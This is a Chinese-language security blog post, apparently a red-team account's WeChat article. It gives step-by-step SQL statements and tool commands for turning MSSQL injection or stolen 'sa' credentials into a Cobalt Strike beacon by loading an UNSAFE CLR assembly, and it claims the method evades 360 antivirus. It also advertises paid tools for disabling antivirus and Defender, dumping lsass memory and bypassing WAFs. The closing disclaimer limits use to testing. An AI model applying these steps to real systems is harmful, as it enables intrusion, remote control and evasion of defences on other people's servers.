现在只对常读和星标的公众号才展示大图推送,建议大家能把星落安全团队“设为星标”,否则可能就看不到了啦!
背景介绍
当我们遇到sqlserver数据库存在SQL注入漏洞时,或者获取到数据库账号密码通过数据库直连软件、但是目标机器上存在杀软会拦截powershell一句话上线cs。那有没有通过sql注入可以直接把payload.bin代码直接注入进去,然后执行上线CS。通过尝试发现是可以的。废话不多说,上教程。获取方式:连同一键kill360、 一键禁用defender、cobaltstrike4.9.1二开版本、免杀插件以及其他发布的工具都放在了内部星球里。
使用方法
通过SQL注入的方式上线CS:
首先开启MSSQL CLR功能
sp_configure 'clr enabled', 1RECONFIGURE
2.需要导入 不安全的程序集
ALTER DATABASE master SET TRUSTWORTHY ON;3. 利用SQL语句导入程序集(利用代码放到了星球内部)
CREATE ASSEMBLY [clr_pp] AUTHORIZATION [dbo] FROM 0xXXXXXXXX WITH PERMISSION_SET = UNSAFE;4 找到 程序集中的StoredProcedures类的ClrExec方法。
CREATE PROCEDURE [dbo].[ClrExec] @cmd NVARCHAR (MAX) AS EXTERNAL NAME [CLR_module].[StoredProcedures].[ClrExec]5. 首先需要通过base64对bin文件代码进行加密得到base64字符串,替换案例base64代码,然后按照以下格式执行命令即可上线CobaltStrike.
exec dbo.ExecCommand "csloader aGVsbHdvcmQ=";通过直连数据库的方式上线CS:
利用到的工具:XlSharpSQLTools
1.首先启用clr
XlSharpSQLTools.exe 192.168.230.130 sa Aa123456 master enable_clr2.然后安装clr功能
XlSharpSQLTools.exe 192.168.230.130 sa Aa123456 master install_clr3.最后使用csloader指定payload.bin文件然后执行即可上线CoblatStrike。
XlSharpSQLTools.exe 192.168.230.130 sa Aa123456 master csloader D:\123\payload.bin免杀效果
物理机360:没有拦截行为,成功上线CS
火绒:
圈子介绍
博主介绍:
目前工作在某安全公司攻防实验室,一线攻击队选手。自2022-2024年总计参加过30+次省/市级攻防演练,擅长工具开发、免杀、代码审计、信息收集、内网渗透等安全技术。
目前已经更新的免杀内容:
一键击溃360+核晶
一键禁用defender
CobaltStrike4.9.1二开
CobaltStrike免杀插件
数据库直连工具免杀版
aspx文件自动上线cobaltbrike
jsp文件自动上线cobaltbrike
哥斯拉免杀工具 XlByPassGodzilla
冰蝎免杀工具 XlByPassBehinder
冰蝎星落专版 xlbehinder
正向代理工具 xleoreg
反向代理工具xlfrc
内网扫描工具 xlscan
CS免杀加载器 xlbpcs
Todesk/向日葵密码读取工具
导出lsass内存工具 xlrls
绕过WAF免杀工具 ByPassWAF
等等...
目前星球已满200人,价格由208元调整为218元(交个朋友啦),300名以后涨价至248元!
关注微信公众号后台回复“入群”,即可进入星落安全交流群!
往期推荐
1.【免杀】ASPX文件加载shellcode实现CobaltStrike上线
2.【免杀】JSP文件加载shellcode自动化实现CobaltStrike上线
3.【免杀】基于fscan 过360核晶、火绒的xlscan v1.2 介绍!
4.【免杀】CobaltStrike4.9.1二开 | 自破解 免杀 修复BUG!
【声明】本文所涉及的技术、思路和工具仅用于安全测试和防御研究,切勿将其用于非法入侵或攻击他人系统以及盈利等目的,一切后果由操作者自行承担!!!
